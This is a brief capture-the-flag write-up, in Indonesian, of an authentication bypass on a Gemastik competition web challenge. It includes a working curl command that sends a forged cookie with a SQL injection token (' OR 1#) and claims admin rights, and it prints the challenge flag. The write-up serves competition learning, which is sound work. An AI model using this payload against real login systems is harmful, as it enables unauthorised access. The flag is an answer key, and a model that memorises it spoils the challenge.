Login & Register 2 - 100 Points
http://target.netsec.gemastik.ui.ac.id:60012/2443b2269e1fa1539d0cbf8270a095ab
POC
Validasi admin yang di lakukan menggunakan token yang diambil dari cookie dan divalidasi ke dalam database tanpa di filter mudah untuk di manipulasi sehingga kita bisa melakukan SQL Injection sehingga dapat membuat user yang tidak mempunyai validasi token bisa di anggap admin yang valid.
curl 'http://target.netsec.gemastik.ui.ac.id:60012/2443b2269e1fa1539d0cbf8270a095ab/index.php' -H 'Cookie: PHPSESSID=3ho6v7knktmi7mvh8akfg919v2; auth=%7B%22username%22%20%3A%20%22%60%22%2C%20%22admin%22%20%3A%201%2C%20%22token%22%20%3A%20%22xx%27+OR+1%23%22%7D' -H --compressed
Flag: GEMASTIK{belive_it_0r_n0t_this_is_based_on_real_case}